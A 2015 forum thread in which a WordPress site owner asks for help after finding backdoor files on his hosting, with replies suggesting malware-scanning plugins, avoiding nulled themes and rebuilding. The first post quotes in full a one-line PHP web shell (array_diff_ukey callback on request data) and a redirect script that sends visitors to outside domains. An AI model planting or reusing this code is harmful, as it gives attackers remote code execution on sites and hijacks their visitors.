1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Need Help, Backdoor in hosting...

Discussion in 'BlackHat Lounge' started by Mike420, Feb 10, 2015.

  1. Mike420

    Mike420 Junior Member

    Joined:
    Apr 13, 2013
    Messages:
    139
    Likes Received:
    30
    Hi ,

    Today i looked at one hosting and found some really fucked up code in some new files.

    Someone is trying to make money from my new wordpress site without any visitors :D

    Did a little search and found that its an backdoor.

    But didnt find info how to remove this shit, there must be some more files...

    Any help welcome...

    cofnig.php
    PHP:
    <?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>
    were.php - his money making links.....
    PHP:
    <?php


    $android 
    strpos($_SERVER['HTTP_USER_AGENT'],"Android");
    $android_urls = array (
                
    'http://com-gem.net/rmpm.php?a=298712&c=wl_con&s=09AND',
                
    'http://com-d5k.net/uzc.php?a=298712&c=wl_con&s=09AND',    
                
    'http://com-2a4.net/ttb.php?a=298712&c=wl_con&s=09AND',                
    );
    $not_android_urls = array (
                
    'http://com-gem.net/htbtp.php?a=314759&c=wl_con&s=09NR',
                
    'http://com-d5k.net/adde.php?a=314759&c=wl_con&s=09NR',
                
    'http://com-2a4.net/amz.php?a=314759&c=wl_con&s=09NR',        
    );
     
    $n mt_rand(0,count($not_android_urls)-1);
     
    $rand_url=$not_android_urls[$n];
     
    if ( 
    $android  == true)
    {
     
    $n mt_rand(0,count($android_urls)-1);
     
    $rand_url=$android_urls[$n];
    }
    ?>
     <meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">
     
  2. phirex

    phirex Power Member

    Joined:
    Nov 17, 2009
    Messages:
    515
    Likes Received:
    259
    download a security plugin that will search for malware.
    or maybe just purchase the theme instead of downloading nulled ones.
     
  3. Conor

    Conor Jr. VIP Jr. VIP

    Joined:
    Nov 7, 2012
    Messages:
    3,548
    Likes Received:
    5,863
    Gender:
    Male
    Location:
    South Africa
    Home Page:
    This plugin has worked well for me in the past:
    https://wordpress.org/plugins/gotmls/

    The easier way is to back up your content, and just redo the site from scratch with new passwords.
     
  4. Mike420

    Mike420 Junior Member

    Joined:
    Apr 13, 2013
    Messages:
    139
    Likes Received:
    30
    Thanks.

    This plugin wont find nothing.

    The thing is i have many domains and all of them have this shit..

    I need to change root,mysql,ftp, wp passwords ?

    And if there is still some file hidden i quess there is no point of changing passwords.
     
  5. Mike420

    Mike420 Junior Member

    Joined:
    Apr 13, 2013
    Messages:
    139
    Likes Received:
    30
    Got it right , my hosting made some exploit scan and removed this shit.

    Stay away from nulled themes, virus and exploit scanners cant always find these things
     
  6. prospect7

    prospect7 Regular Member

    Joined:
    Feb 24, 2010
    Messages:
    273
    Likes Received:
    195
    fiverr has guys that will do a security audit on your server plus remove the malicious scripts for you.